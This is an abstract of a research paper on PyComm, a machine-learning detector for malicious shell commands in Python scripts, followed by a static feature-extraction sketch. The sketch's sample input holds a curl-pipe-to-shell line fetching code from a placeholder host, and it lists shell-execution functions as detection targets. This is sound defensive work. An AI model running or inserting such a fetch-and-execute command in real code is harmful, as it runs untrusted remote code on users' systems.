PyComm: Malicious commands detection model for python scripts

Anmin Zhou, Tianyi Huang, Cheng Huang, Dunhan Li, Chuangchuang Song
DOI: https://doi.org/10.3233/jifs-211557
2022-02-02
Abstract: Python is a concise language that can be used to build lightweight tools or dynamic object-oriented applications. The various attributes of Python have made it attractive to numerous malware authors. Attackers often embed malicious shell commands in Python scripts to carry out illegal operations. However, traditional static analysis methods are poorly suited to detecting this kind of attack because they focus on common features and fail to find those malicious commands. Dynamic analysis, on the other hand, is not optimal in this case because it is time-consuming and inefficient. In this paper, we propose PyComm, a machine-learning model for detecting malicious commands in Python scripts using multidimensional features: 12 statistical features together with string sequences from the Python source code. Three comparison experiments are designed to evaluate the validity of the proposed method. Experimental results show that the presented model, built on these practical features and the random forest (RF) algorithm, achieves excellent performance, with an accuracy of 0.955 and a recall of 0.943.
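To make the idea of combining statistical features with string sequences concrete, here is a minimal sketch in Python. It is not the authors' implementation: the abstract does not list the 12 statistical features, so the three counts below, the `SHELL_SINKS` set, and the function names are all hypothetical stand-ins chosen for illustration. The sketch parses a script with the standard `ast` module, collects its string literals, and counts calls to a few functions that commonly execute shell commands; a classifier such as a random forest could then be trained on features like these.

```python
import ast

# Hypothetical list of shell-execution entry points (an assumption,
# not the feature set used in the paper).
SHELL_SINKS = {
    "os.system", "os.popen",
    "subprocess.run", "subprocess.call",
    "subprocess.Popen", "subprocess.check_output",
}


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def extract_features(source):
    """Collect string literals and a few illustrative statistics."""
    tree = ast.parse(source)
    strings = []
    shell_calls = 0
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            strings.append(node.value)  # string sequence candidates
        elif isinstance(node, ast.Call) and dotted_name(node.func) in SHELL_SINKS:
            shell_calls += 1  # call that may run a shell command
    return {
        "num_strings": len(strings),
        "max_string_len": max((len(s) for s in strings), default=0),
        "num_shell_calls": shell_calls,
        "strings": strings,
    }


if __name__ == "__main__":
    sample = 'import os\nos.system("curl http://example.invalid/x | sh")\n'
    print(extract_features(sample))
```

Because the sketch only parses the script and never runs it, it stays on the static-analysis side; note that it matches call names literally, so aliased imports such as `from os import system` would be missed.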